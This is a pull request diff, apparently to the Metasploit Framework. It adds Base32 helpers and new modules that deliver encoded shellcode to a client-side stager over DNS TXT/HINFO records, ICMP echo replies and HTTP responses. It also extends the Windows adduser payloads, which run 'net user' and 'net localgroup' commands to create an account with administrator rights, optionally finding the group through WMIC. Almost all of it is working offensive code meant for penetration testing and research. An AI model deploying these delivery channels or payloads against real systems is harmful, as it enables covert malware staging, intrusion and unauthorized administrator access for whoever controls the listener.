### PR TITLE
dns/icmp/http payload delivery modules + Base32 support

### DIFF
--- a/lib/rex/text.rb
+++ b/lib/rex/text.rb
@@ -32,6 +32,7 @@ module Text
 	UpperAlpha   = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
 	LowerAlpha   = "abcdefghijklmnopqrstuvwxyz"
 	Numerals     = "0123456789"
+	Base32       = "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567"
 	Alpha        = UpperAlpha + LowerAlpha
 	AlphaNumeric = Alpha + Numerals
 	HighAscii    = [*(0x80 .. 0xff)].pack("C*")
@@ -693,6 +694,83 @@ module Text
 	##
 
 	#
+	# Base32 code
+	#
+
+	# Based on --> https://github.com/stesla/base32
+
+	# Copyright (c) 2007-2011 Samuel Tesla
+
+	# Permission is hereby granted, free of charge, to any person obtaining a copy
+	# of this software and associated documentation files (the "Software"), to deal
+	# in the Software without restriction, including without limitation the rights
+	# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+	# copies of the Software, and to permit persons to whom the Software is
+	# furnished to do so, subject to the following conditions:
+
+	# The above copyright notice and this permission notice shall be included in
+	# all copies or substantial portions of the Software.
+
+	# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+	# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+	# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+	# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+	# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+	# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
+	# THE SOFTWARE.
+
+
+	#
+	# Base32 encoder
+	#
+	def self.b32encode(bytes_in)
+		n = (bytes_in.length * 8.0 / 5.0).ceil
+		p = n < 8 ? 5 - (bytes_in.length * 8) % 5 : 0
+		c = bytes_in.inject(0) {|m,o| (m << 8) + o} << p
+		[(0..n-1).to_a.reverse.collect {|i| Base32[(c >> i * 5) & 0x1f].chr},
+		("=" * (8-n))]
+	end
+
+	def self.encode_base32(str)
+		bytes = str.bytes
+		result = ''
+		size= 5
+		while bytes.any? do
+			bytes.each_slice(size) do |a|
+			bytes_out = b32encode(a).flatten.join
+			result << bytes_out
+			bytes = bytes.drop(size)
+			end
+		end
+		return result
+	end
+
+	#
+	# Base32 decoder
+	#
+	def self.b32decode(bytes_in)
+		bytes = bytes_in.take_while {|c| c != 61} # strip padding
+		n = (bytes.length * 5.0 / 8.0).floor
+		p = bytes.length < 8 ? 5 - (n * 8) % 5 : 0
+		c = bytes.inject(0) {|m,o| (m << 5) + Base32.index(o.chr)} >> p
+		(0..n-1).to_a.reverse.collect {|i| ((c >> i * 8) & 0xff).chr}
+	end
+
+	def self.decode_base32(str)
+		bytes = str.bytes
+		result = ''
+		size= 8
+		while bytes.any? do
+			bytes.each_slice(size) do |a|
+			bytes_out = b32decode(a).flatten.join
+			result << bytes_out
+			bytes = bytes.drop(size)
+			end
+		end
+		return result
+	end
+
+	#
 	# Base64 encoder
 	#
 	def self.encode_base64(str, delim='')
@@ -1217,7 +1295,7 @@ protected
 	def self.checksum8(str)
 		str.unpack("C*").inject(:+) % 0x100
 	end
-	
+
 	def self.checksum16_le(str)
 		str.unpack("v*").inject(:+) % 0x10000
 	end

--- a/modules/exploits/multi/dns_payload_delivery.rb
+++ b/modules/exploits/multi/dns_payload_delivery.rb
@@ -1,0 +1,275 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+
+require 'msf/core'
+require 'resolv'
+
+
+class Metasploit3 < Msf::Exploit::Remote
+    Rank = ExcellentRanking
+
+    include Msf::Exploit::Remote::Capture
+    include Msf::Auxiliary::Report
+
+
+    def initialize
+        super(
+            'Name'        => 'DNS Payload Delivery Service',
+            'Version'     => '$Revision$',
+            'Description'    => %q{
+                This module is designed for out-of-band payload delivery.
+                When started this module will create an DNS listener that monitors incoming DNS
+                requests for a specified domain. Once a request is received the module will then
+                encode the chosen payload and deliver it back to the source of the request as a
+                DNS response. Larger payloads will be split amongst a number of sub-domains to keep
+                within the size limits of UDP DNS reponses (576 bytes).
+
+                A client-side script of application is required to make use of this module.
+                The server-side portion is made available to allow further research into
+                alternative shellcode delivery mechanisms.
+            },
+            'Author'      => 'Chris John Riley',
+            'License'     => MSF_LICENSE,
+            'References'    =>
+                [
+                    # general
+                    ['URL', 'http://blog.c22.cc']
+                ],
+            'Payload'        =>
+                    {
+                            'Space'       => 1400,
+                            'BadChars'    => '',
+                            'DisableNops' => true,
+                    },
+            'Platform'       => [ 'win', 'linux', 'solaris', 'unix', 'osx', 'bsd', 'php', 'java' ],
+            'Arch'           => ARCH_ALL,
+            'Targets'        => [ [ 'Wildcard Target', { } ] ],
+            'DefaultTarget'  => 0
+        )
+
+        register_options(
+            [
+                OptAddress.new('SRVHOST',   [ true, "The local host to listen on.", '0.0.0.0' ]),
+                OptPort.new('SRVPORT',      [ true, "The local port to listen on.", 53 ]),
+                OptString.new('DOMAIN',     [ true, "The domain name to resolve (sub-domains will be created", '*' ]),
+                OptString.new('ENCODING',   [ true, 'Specify base32/base64 encoding', 'base32' ]),
+                OptString.new('PREFIX',     [ false, 'Prepend value to shellcode delivery', 'SC' ]),
+                OptString.new('PREFIX_NUM', [ false, 'Assign numbers after prefix', true]),
+            ], self.class)
+
+        register_advanced_options(
+            [
+                OptBool.new("ExitOnSession", [ false, "Return from the exploit after a session has been created", true ]),
+                OptBool.new("ALLOW_PASSTHRU", [true, "Allow A record requests to be passed on to be resolved", true]),
+            ], self.class)
+
+        deregister_options('SNAPLEN','FILTER','PCAPFILE','RHOST','UDP_SECRET','GATEWAY','NETMASK', 'TIMEOUT')
+    end
+
+
+    def exploit
+
+        if not datastore['ExitOnSession'] and not job_id
+            raise RuntimeError, "#{name}: Setting ExitOnSession to false requires running as a job (exploit -j)"
+        end
+
+        begin
+            @port = datastore['SRVPORT'].to_i
+            @host = datastore['SRVHOST']
+
+            @domain = datastore['DOMAIN']
+            @prefix = datastore['PREFIX']
+            @prefix_num = datastore['PREFIX_NUM']
+            @encoding = datastore['ENCODING'].downcase
+
+            print_status("#{name}: Monitoring requests for subdomains of %s" % @domain)
+            # create and split up payload
+            splitpayload
+
+            # start listner
+            print_status("#{name}: Starting DNS Server on %s:%s" % [@host, @port])
+            dnslistener
+
+        rescue  =>  ex
+            print_error(ex.message)
+        ensure
+            print_status("#{name}: Stopping DNS Server on %s:%s" % [@host, @port])
+        end
+    end
+
+    def dnslistener
+
+        # MacOS X workaround
+        ::Socket.do_not_reverse_lookup = true
+
+        @sock = ::UDPSocket.new()
+        @sock.setsockopt(::Socket::SOL_SOCKET, ::Socket::SO_REUSEADDR, 1)
+        @sock.bind(@host, @port)
+
+        print_status("#{name}: DNS server started")
+
+        begin
+            while true
+                packet, addr = @sock.recvfrom(65535)
+                break if packet.length == 0
+
+                request = Resolv::DNS::Message.decode(packet)
+                @answer = Resolv::DNS::Message::new(request.id)
+                @answer.qr = 1
+                @answer.aa = 1
+                @answer.opcode = request.opcode
+                @answer.rd = request.rd
+                @answer.ra = 0
+                @answer.rcode = 0
+                ttl = 16000
+                reply = false
+
+                request.each_question {|hname, typeclass|
+                    reply = false
+                    @hname = hname.to_s
+                    @record_type = typeclass.name.split("::").last
+
+                if datastore['VERBOSE']
+                    print_status("DNS: #{addr[3]}:#{addr[1]} ID: #{request.id} HOSTNAME: #{@hname} TYPE: #{@record_type}")
+                end
+
+                    case @record_type
+                    when 'TXT'
+                        if @hname.ends_with?("." + @domain)
+                            @answer.add_answer(@hname + ".", ttl, Resolv::DNS::Resource::IN::TXT.new(@enc_payload.pop))
+                            @answer.encode
+                            print_good("#{name}: Delivering payload section %d via #{@record_type.to_s} record answer" % [@split_payload.length - @enc_payload.length])
+                            reply = true
+                        else
+                            print_debug("Ignoring request for %s as it's not in scope (*.%s)" % [@hname, @domain]) if datastore['VERBOSE']
+                        end
+                    when 'HINFO'
+                        if @hname.ends_with?("." + @domain)
+                            @answer.add_answer(@hname + ".", ttl, Resolv::DNS::Resource::IN::HINFO.new(@enc_payload.pop, ''))
+                            @answer.encode
+                            print_good("#{name}: Delivering payload section %d via #{@record_type.to_s} record answer" % [@split_payload.length - @enc_payload.length])
+                            reply = true
+                        else
+                            print_debug("Ignoring request for %s as it's not in scope (*.%s)" % [@hname, @domain]) if datastore['VERBOSE']
+                        end
+                    when 'A'
+                        # pass thu lookup to another DNS server
+                        if datastore['ALLOW_PASSTHRU']
+                            resolv = pass_thru_lookup
+                            reply = true if not resolv == 0
+                        else
+                            next
+                        end
+                    else
+                        print_error("#{name}: Unsupported record type %s" % @record_type)
+                    end
+                }
+
+                if reply
+                    @sock.send(@answer.encode, 0, addr[3], addr[1])
+                end
+
+                if @enc_payload.length == 0
+                    print_status("#{name}: All %d sections of shellcode delivered, waiting for session" % @split_payload.length)
+                    if datastore['ExitOnSession'] and not job_id
+                        if session_created?
+                            return
+                        else
+                            select(nil,nil,nil,3)
+                            return if session_created?
+                        end
+                        print_error("#{name}: No session created - Ending")
+                        return
+                    elsif not datastore['ExitOnSession'] or job_id
+                        print_status("#{name}: Running as background job - Creating new payload")
+                        splitpayload
+                    end
+                end
+            end
+
+        rescue ::Exception => e
+            print_error("#{name}: #{e.class} #{e}")
+        # Make sure the socket gets closed on exit
+        ensure
+            @sock.close
+        end
+    end
+
+    def pass_thru_lookup
+        print_debug("#{name}: Passing #{@hname} on to be resolved") if datastore['VERBOSE']
+
+        begin
+            ip = Resolv::DNS.new().getaddress(@hname).to_s
+            resolv = Resolv::DNS::Resource::IN::A.new( ip )
+            print_debug("#{name}: DNS bypass domain #{@hname} resolved #{ip}") if datastore['VERBOSE']
+            @answer.add_answer(@hname, 60, resolv)
+            @answer.encode
+        rescue
+            print_debug("#{name}: DNS bypass domain #{@hname} unable to resolve") if datastore['VERBOSE']
+            resolv = 0
+        end
+        return resolv
+    end
+
+    def encodepayload
+        # encode payload into Base64/Base32 as required
+
+        p = payload.encoded
+        if @encoding == 'base64'
+            enc_payload = Rex::Text.encode_base64(p)
+            print_status("#{name}: Encoding payload using base64")
+            return enc_payload
+        elsif @encoding == 'base32'
+            enc_payload = Rex::Text.encode_base32(p)
+            print_status("#{name}: Encoding payload using base32")
+            return enc_payload
+        else
+            raise RuntimeError , "Invalid encoding type"
+        end
+    end
+
+    def splitpayload
+        # split into chunks for delivery
+        payload_size = 250 - @prefix.length
+        tosplit = encodepayload
+        @split_payload = []
+        start = 0
+        while start < tosplit.length
+            @split_payload << tosplit[start..start+payload_size-1]
+            start = start + payload_size
+        end
+        print_status("#{name}: Splitting payload into %d chunks" % @split_payload.length)
+        @enc_payload = []
+        if @prefix_num
+            num = 0
+            @split_payload.each do | epay |
+                @enc_payload << @prefix.to_s + num.to_s + epay
+                num = num+1
+            end
+        else
+            @split_payload.each do | epay |
+                @enc_payload << @prefix.to_s + epay
+            end
+        end
+
+        if datastore['VERBOSE']
+            i=1
+            @enc_payload.each do | shellcode |
+                print_debug("#{name}: Split payload (Section %d) ::: \n%s" % [i, shellcode])
+                i = i +1
+            end
+        end
+
+        @enc_payload.reverse!
+
+    end
+end

--- a/modules/exploits/multi/http_payload_delivery.rb
+++ b/modules/exploits/multi/http_payload_delivery.rb
@@ -1,0 +1,93 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+    Rank = ExcellentRanking
+
+    include Msf::Exploit::Remote::HttpServer::HTML
+    include Msf::Auxiliary::Report
+
+    def initialize
+        super(
+            'Name'        => 'HTTP Payload Delivery Service',
+            'Version'     => '$Revision$',
+            'Description'    => %q{
+                This module is designed for out-of-band payload delivery.
+                When started this module will create an HTTP Server that monitors incoming HTTP(S)
+                requests. Once a request is received the module will then encode the chosen payload
+                and deliver it back to the source of the request in the response body.
+
+                A client-side script of application is required to make use of this module.
+                The server-side portion is made available to allow further research into
+                alternative shellcode delivery mechanisms.
+            },
+            'Author'      => 'Chris John Riley',
+            'License'     => MSF_LICENSE,
+            'References'    =>
+                [
+                    # general
+                    ['URL', 'http://blog.c22.cc']
+                ],
+            'Payload'        =>
+                    {
+                            'Space'       => 1400,
+                            'BadChars'    => '',
+                            'DisableNops' => true,
+                    },
+            'Platform'       => [ 'win', 'linux', 'solaris', 'unix', 'osx', 'bsd', 'php', 'java' ],
+            'Arch'           => ARCH_ALL,
+            'Targets'        => [ [ 'Wildcard Target', { } ] ],
+            'DefaultTarget'  => 0
+        )
+
+        register_options(
+            [
+                OptString.new('ENCODING',   [ true, 'Specify base32/base64 encoding', 'base32' ]),
+                OptString.new('PREFIX',     [ false, 'Prepend value to shellcode delivery', 'SC' ]),
+                OptPort.new('SRVPORT',      [ true, 'The local port to listen on.', 80]),
+            ], self.class)
+
+        deregister_options('SNAPLEN','FILTER','PCAPFILE','RHOST','UDP_SECRET','GATEWAY','NETMASK', 'TIMEOUT')
+    end
+
+    def on_request_uri(cli, request)
+        @encoding = datastore['ENCODING'].downcase
+        @prefix = datastore['PREFIX']
+        content = @prefix + encodepayload.to_s
+
+        print_status("#{cli.peerhost}:#{cli.peerport} Sending payload ...")
+        send_response_html(cli, content, { 'Content-Type' => 'application/xml' })
+    end
+
+    def run
+        exploit()
+    end
+
+    def encodepayload
+        # encode payload into Base64/Base32 as required
+
+        p = payload.encoded
+        if @encoding == 'base64'
+            enc_payload = Rex::Text.encode_base64(p)
+            print_status("#{name}: Encoding payload using base64")
+            return enc_payload
+        elsif @encoding == 'base32'
+            enc_payload = Rex::Text.encode_base32(p)
+            print_status("#{name}: Encoding payload using base32")
+            return enc_payload
+        else
+            raise RuntimeError , "Invalid encoding type"
+        end
+    end
+
+end

--- a/modules/exploits/multi/icmp_payload_delivery.rb
+++ b/modules/exploits/multi/icmp_payload_delivery.rb
@@ -1,0 +1,212 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+    Rank = ExcellentRanking
+
+    include Msf::Exploit::Remote::Capture
+    include Msf::Auxiliary::Report
+
+    def initialize
+        super(
+            'Name'        => 'ICMP Payload Delivery Service',
+            'Version'     => '$Revision$',
+            'Description' => %q{
+                This module is designed for out-of-band payload delivery.
+                When started this module will create an ICMP listener that monitors incoming ICMP
+                echo requests (type:8,Code:0) containing the configured trigger value within the
+                data portion of the packet. Once a trigger is received the module will then encode
+                the chosen payload and deliver it back to the source of the request as a ICMP echo
+                response (type:0,Code:0) again within the data portion of the packet.
+
+                A client-side script of application is required to make use of this module. The
+                server-side portion is made available to allow further research into alternative
+                shellcode delivery mechanisms.
+            },
+            'Author'        =>     'Chris John Riley',
+            'License'       =>     MSF_LICENSE,
+            'References'    =>
+                [
+                    # general
+                    ['URL', 'http://blog.c22.cc']
+                ],
+            'Payload'        =>
+                    {
+                            'Space'       => 1400,
+                            'BadChars'    => '',
+                            'DisableNops' => true,
+                    },
+            'Platform'       => [ 'win', 'linux', 'solaris', 'unix', 'osx', 'bsd', 'php', 'java' ],
+            'Arch'           => ARCH_ALL,
+            'Targets'        => [ [ 'Wildcard Target', { } ] ],
+            'DefaultTarget'  => 0
+        )
+
+        register_options([
+            OptString.new('TRIGGER',      [true, 'Trigger to listen for (data payload)']),
+            OptString.new('PREFIX',        [false, 'Prepend value to shellcode delivery']),
+            OptString.new('BPF_FILTER',      [true, 'BFP format filter to listen for', 'icmp']),
+            OptString.new('INTERFACE',     [false, 'The name of the interface']),
+            OptString.new('ENCODING',       [false, 'Specify base32/base64 encoding', 'base32' ]),
+        ], self.class)
+
+        register_advanced_options([
+            OptString.new('CLOAK',        [false, 'Create the response packet using specific OS fingerprint (windows, linux, freebsd)', 'linux']),
+            OptBool.new('PROMISC',         [true, 'Enable/Disable promiscuous mode', false]),
+            OptBool.new("ExitOnSession", [ false, "Return from the exploit after a session has been created", true ]),
+        ], self.class)
+
+        deregister_options('SNAPLEN','FILTER','PCAPFILE','RHOST','UDP_SECRET','GATEWAY','NETMASK', 'TIMEOUT')
+    end
+
+    def exploit
+
+        if not datastore['ExitOnSession'] and not job_id
+            raise RuntimeError, "Setting ExitOnSession to false requires running as a job (exploit -j)"
+        end
+
+        begin
+            @interface = datastore['INTERFACE'] || Pcap.lookupdev
+            @interface = get_interface_guid(@interface)
+            @iface_ip = Pcap.lookupaddrs(@interface)[0]
+
+            @filter = datastore['BPF_FILTER']
+            @trigger = datastore['TRIGGER']
+            @prefix = datastore['PREFIX'] || ''
+            @promisc = datastore['PROMISC']
+            @cloak = datastore['CLOAK'].downcase
+            @encoding = datastore['ENCODING'].downcase
+            @enc_payload = encodepayload
+
+            if @promisc
+                 print_status "Warning: Promiscuous mode enabled"
+            end
+
+            # start listner
+            icmplistener
+
+        rescue  =>  ex
+            print_error(ex.message)
+        ensure
+            print_status "Stopping ICMP listener on %s (%s)" % [@interface, @iface_ip]
+        end
+
+    end
+
+    def icmplistener
+        # start listener
+
+        print_status "ICMP Listener started on %s (%s). Monitoring for packets containing %s" % [@interface, @iface_ip, @trigger]
+        cap = PacketFu::Capture.new(:iface => @interface, :start => true, :filter => @filter, :promisc => @promisc)
+        while not session_created?
+            cap.stream.each do |pkt|
+                return if session_created? and datastore['ExitOnSession']
+                packet = PacketFu::Packet.parse(pkt)
+                data = packet.payload[4..-1]
+                if packet.is_icmp? and data =~ /#{@trigger}/
+                    print_status "#{Time.now}: SRC:%s ICMP (type %d code %d) DST:%s" % [packet.ip_saddr, packet.icmp_type, packet.icmp_code, packet.ip_daddr]
+
+                    # detect and warn if system is responding to ICMP echo requests
+                    # suggested fixes:
+                    #
+                    # (linux) echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
+                    # (Windows) netsh firewall set icmpsetting 8 disable
+                    # (Windows cont.) netsh firewall set opmode mode = ENABLE
+
+                    if packet.icmp_type == 0 and packet.icmp_code == 0 and packet.ip_saddr == @iface_ip
+                        print_error "Dectected ICMP echo response. The client may receive multiple repsonses"
+                    end
+
+                    @src_ip = packet.ip_daddr
+                    @src_mac = packet.eth_daddr
+                    @dst_ip = packet.ip_saddr
+                    @dst_mac = packet.eth_saddr
+                    @icmp_id = packet.payload[0,2]
+                    @icmp_seq = packet.payload[2,2]
+                    # create payload with matching id/seq
+                    @resp_payload = @icmp_id + @icmp_seq + @prefix + @enc_payload
+
+                    # create response packet icmp_pkt
+                    icmp_packet
+
+                    if not @icmp_response
+                        raise RuntimeError , "Could not build a ICMP resonse"
+                    else
+                        # send response packet icmp_pkt
+                        send_icmp
+
+                        if session_created? and datastore['ExitOnSession']
+                            return
+                        elsif datastore['ExitOnSession']
+                            # wait 3 seconds and recheck session else you get stuck in cap.stream.each till you receive a new ICMP packet
+                            select(nil,nil,nil,3)
+                            return if session_created?
+                        end
+                    end
+
+                elsif packet.is_icmp? and not packet.icmp_type == 0
+                    print_debug 'Ignoring packet without trigger value from source %s' % packet.ip_saddr if datastore['VERBOSE']
+                end
+            end
+        end
+    end
+
+    def icmp_packet
+        # create icmp response
+
+        begin
+            icmp_pkt = PacketFu::ICMPPacket.new(:flavor => @cloak)
+            icmp_pkt.eth_saddr = @src_mac
+            icmp_pkt.eth_daddr = @dst_mac
+            icmp_pkt.icmp_type = 0
+            icmp_pkt.icmp_code = 0
+            icmp_pkt.payload = @resp_payload
+            icmp_pkt.ip_saddr = @src_ip
+            icmp_pkt.ip_daddr = @dst_ip
+            icmp_pkt.recalc
+            @icmp_response = icmp_pkt
+        rescue  =>  ex
+            print_error(ex.message)
+        end
+    end
+
+    def send_icmp
+        # send icmp response
+
+        begin
+            @icmp_response.to_w(iface = @interface)
+            print_good "Payload sent to %s containing %d bytes of data" % [@dst_ip, @enc_payload.length]
+        rescue  =>  ex
+            print_error(ex.message)
+        end
+    end
+
+    def encodepayload
+        # encode payload into Base64/Base32 as required
+
+        p = payload.encoded
+        if @encoding == 'base64'
+            enc_payload = Rex::Text.encode_base64(p)
+            print_status "Encoding payload using base64"
+            print_debug "Resulting Base64 Encoded payload is ::: %s" % enc_payload if datastore['VERBOSE']
+            return enc_payload
+        elsif @encoding == 'base32'
+            enc_payload = Rex::Text.encode_base32(p)
+            print_status "Encoding payload using base32"
+            print_debug "Resulting Base32 Encoded payload is ::: %s" % enc_payload if datastore['VERBOSE']
+            return enc_payload
+        else
+            raise RuntimeError , "Invalid encoding type"
+        end
+    end
+end

--- a/modules/payloads/singles/cmd/windows/adduser.rb
+++ b/modules/payloads/singles/cmd/windows/adduser.rb
@@ -13,48 +13,72 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
-	include Msf::Payload::Single
-	include Msf::Sessions::CommandShellOptions
+    include Msf::Payload::Single
+    include Msf::Sessions::CommandShellOptions
 
-	def initialize(info = {})
-		super(merge_info(info,
-			'Name'        => 'Windows Execute net user /ADD CMD',
-			'Version'     => '$Revision$',
-			'Description' => 'Create a new user and add them to local administration group',
-			'Author'      => ['hdm','scriptjunkie'],
-			'License'     => MSF_LICENSE,
-			'Platform'    => 'win',
-			'Arch'        => ARCH_CMD,
-			'Handler'     => Msf::Handler::None,
-			'Session'     => Msf::Sessions::CommandShell,
-			'PayloadType' => 'cmd',
-			'Payload'     =>
-				{
-					'Offsets' => { },
-					'Payload' => ''
-				}
-			))
+    def initialize(info = {})
+        super(merge_info(info,
+            'Name'        => 'Windows Execute net user /ADD CMD',
+            'Version'     => '$Revision$',
+            'Description' => 'Create a new user and add them to local administration group',
+            'Author'      => ['hdm','scriptjunkie','Chris John Riley'],
+            'License'     => MSF_LICENSE,
+            'Platform'    => 'win',
+            'Arch'        => ARCH_CMD,
+            'Handler'     => Msf::Handler::None,
+            'Session'     => Msf::Sessions::CommandShell,
+            'PayloadType' => 'cmd',
+            'Payload'     =>
+                {
+                    'Offsets' => { },
+                    'Payload' => ''
+                }
+            ))
 
-		register_options(
-			[
-				OptString.new('USER', [ true, "The username to create",     "metasploit" ]),
-				OptString.new('PASS', [ true, "The password for this user", "metasploit" ]),
-			], self.class)
-	end
+        register_options(
+            [
+                OptString.new('USER',   [ true, "The username to create",     "metasploit" ]),
+                OptString.new('PASS',   [ true, "The password for this user", "metasploit" ]),
+                OptString.new('CUSTOM', [ false, "Custom group name to be used instead of default", '' ]),
+                OptBool.new('WMIC',     [ true, "Use WMIC on the target system to find the name of the local administrators group", false ]),
+            ], self.class)
+    end
 
-	def generate
-		return super + command_string
-	end
+    def generate
+        return super + command_string
+    end
 
-	def command_string
-		user = datastore['USER'] || 'metasploit'
-		pass = datastore['PASS'] || ''
+    def command_string
+        user = datastore['USER'] || 'metasploit'
+        pass = datastore['PASS'] || ''
+        cust = datastore['CUSTOM'] || ''
+        wmic = datastore['WMIC']
 
-		if(pass.length > 14)
-			raise ArgumentError, "Password for the adduser payload must be 14 characters or less"
-		end
+        if(pass.length > 14)
+            raise ArgumentError, "Password for the adduser payload must be 14 characters or less"
+        end
 
-		return "cmd.exe /c net user #{user} #{pass} /ADD && " +
-			"net localgroup Administrators #{user} /ADD"
-	end
+        #
+        # Check if the PASS parameter meets commonly used complexity requirements and inform the user (no blocking implemented)
+        #
+        if(pass =~ /\A^.*((?=.{8,})(?=.*[a-z])(?=.*[A-Z])(?=.*[\d\W])).*$/)
+            print_status("Password passes complexity requirements")
+        else
+            print_error("Password failed complexity requirements, this command may fail on systems that require complex passwords")
+        end
+
+        if not cust.empty?
+            print_status("Using custom group name #{cust}")
+            return "cmd.exe /c net user #{user} #{pass} /ADD && " +
+                "net localgroup \"#{cust}\" #{user} /ADD"
+        elsif wmic
+            print_status("Using WMIC to discover the administrative group name")
+            return "cmd.exe /c \"FOR /F \"usebackq skip=1\" %g IN (`wmic group where sid^='S-1-5-32-544' get name`)\"; do " +
+                "net user #{user} #{pass} /ADD && "+
+                "net localgroup %g #{user} /ADD"
+        else
+            return "cmd.exe /c net user #{user} #{pass} /ADD && " +
+                "net localgroup Administrators #{user} /ADD"
+        end
+    end
 end

--- a/modules/payloads/singles/cmd/windows/adduser.rb
+++ b/modules/payloads/singles/cmd/windows/adduser.rb
@@ -40,8 +40,14 @@ module Metasploit3
                 OptString.new('USER',   [ true, "The username to create",     "metasploit" ]),
                 OptString.new('PASS',   [ true, "The password for this user", "metasploit" ]),
                 OptString.new('CUSTOM', [ false, "Custom group name to be used instead of default", '' ]),
-                OptBool.new('WMIC',     [ true, "Use WMIC on the target system to find the name of the local administrators group", false ]),
+                OptBool.new('WMIC',     [ true, "Use WMIC on the target system to resolve administrators groupname", false ]),
             ], self.class)
+
+        register_advanced_options(
+            [
+                OptBool.new("COMPLEXITY", [ true, "Check password for complexity rules", true ]),
+            ], self.class)
+
     end
 
     def generate
@@ -53,18 +59,16 @@ module Metasploit3
         pass = datastore['PASS'] || ''
         cust = datastore['CUSTOM'] || ''
         wmic = datastore['WMIC']
+        complexity= datastore['COMPLEXITY']
 
         if(pass.length > 14)
             raise ArgumentError, "Password for the adduser payload must be 14 characters or less"
         end
 
-        #
-        # Check if the PASS parameter meets commonly used complexity requirements and inform the user (no blocking implemented)
-        #
-        if(pass =~ /\A^.*((?=.{8,})(?=.*[a-z])(?=.*[A-Z])(?=.*[\d\W])).*$/)
-            print_status("Password passes complexity requirements")
-        else
-            print_error("Password failed complexity requirements, this command may fail on systems that require complex passwords")
+        if (pass =~ /\A^.*((?=.{8,})(?=.*[a-z])(?=.*[A-Z])(?=.*[\d\W])).*$/) and complexity
+            print_good "Password: #{pass} passes complexity checks"
+        elsif complexity
+            print_error "Password: #{pass} doesn't meet complexity requirements and may cause issues"
         end
 
         if not cust.empty?
@@ -73,9 +77,10 @@ module Metasploit3
                 "net localgroup \"#{cust}\" #{user} /ADD"
         elsif wmic
             print_status("Using WMIC to discover the administrative group name")
-            return "cmd.exe /c \"FOR /F \"usebackq skip=1\" %g IN (`wmic group where sid^='S-1-5-32-544' get name`)\"; do " +
-                "net user #{user} #{pass} /ADD && "+
-                "net localgroup %g #{user} /ADD"
+            return "cmd.exe /c \"FOR /F \"usebackq tokens=2* skip=1 delims==\" %G IN (`wmic group where sid^='S-1-5-32-544' get name /Value`); do " +
+                "FOR /F \"usebackq tokens=1 delims==\" %X IN (`echo %G`); do " +
+                "net user #{user} #{pass} /ADD && " +
+                "net localgroup \"%X\" #{user} /ADD\""
         else
             return "cmd.exe /c net user #{user} #{pass} /ADD && " +
                 "net localgroup Administrators #{user} /ADD"

--- a/modules/payloads/singles/windows/adduser.rb
+++ b/modules/payloads/singles/windows/adduser.rb
@@ -43,6 +43,11 @@ module Metasploit3
                 OptBool.new('WMIC',     [ true, "Use WMIC on the target system to find the name of the local administrators group", false ]),
             ], self.class)
 
+        register_advanced_options(
+            [
+                OptBool.new("COMPLEXITY", [ true, "Check password for complexity rules", true ]),
+            ], self.class)
+
         # Hide the CMD option...this is kinda ugly
         deregister_options('CMD')
     end
@@ -55,18 +60,16 @@ module Metasploit3
         pass = datastore['PASS'] || ''
         cust = datastore['CUSTOM'] || ''
         wmic = datastore['WMIC']
+        complexity= datastore['COMPLEXITY']
 
         if(pass.length > 14)
             raise ArgumentError, "Password for the adduser payload must be 14 characters or less"
         end
 
-        #
-        # Check if the PASS parameter meets commonly used complexity requirements and inform the user (no blocking implemented)
-        #
-        if(pass =~ /\A^.*((?=.{8,})(?=.*[a-z])(?=.*[A-Z])(?=.*[\d\W])).*$/)
-            print_status("Password passes complexity requirements")
-        else
-            print_error("Password failed complexity requirements, this command may fail on systems that require complex passwords")
+        if (pass =~ /\A^.*((?=.{8,})(?=.*[a-z])(?=.*[A-Z])(?=.*[\d\W])).*$/) and complexity
+            print_good "Password: #{pass} passes complexity checks"
+        elsif complexity
+            print_error "Password: #{pass} doesn't meet complexity requirements and may cause issues"
         end
 
         if not cust.empty?
@@ -75,9 +78,10 @@ module Metasploit3
                 "net localgroup \"#{cust}\" #{user} /ADD"
         elsif wmic
             print_status("Using WMIC to discover the administrative group name")
-            return "cmd.exe /c \"FOR /F \"usebackq skip=1\" %g IN (`wmic group where sid^='S-1-5-32-544' get name`)\"; do " +
-                "net user #{user} #{pass} /ADD && "+
-                "net localgroup %g #{user} /ADD"
+            return "cmd.exe /c \"FOR /F \"usebackq tokens=2* skip=1 delims==\" %G IN (`wmic group where sid^='S-1-5-32-544' get name /Value`); do " +
+                "FOR /F \"usebackq tokens=1 delims==\" %X IN (`echo %G`); do " +
+                "net user #{user} #{pass} /ADD && " +
+                "net localgroup \"%X\" #{user} /ADD\""
         else
             return "cmd.exe /c net user #{user} #{pass} /ADD && " +
                 "net localgroup Administrators #{user} /ADD"

--- a/modules/payloads/singles/windows/adduser.rb
+++ b/modules/payloads/singles/windows/adduser.rb
@@ -21,43 +21,67 @@ require 'msf/core/payload/windows/exec'
 ###
 module Metasploit3
 
-	include Msf::Payload::Windows::Exec
+    include Msf::Payload::Windows::Exec
 
-	def initialize(info = {})
-		super(update_info(info,
-			'Name'          => 'Windows Execute net user /ADD',
-			'Version'       => '$Revision$',
-			'Description'   => 'Create a new user and add them to local administration group',
-			'Author'        => 'hdm',
-			'License'       => MSF_LICENSE,
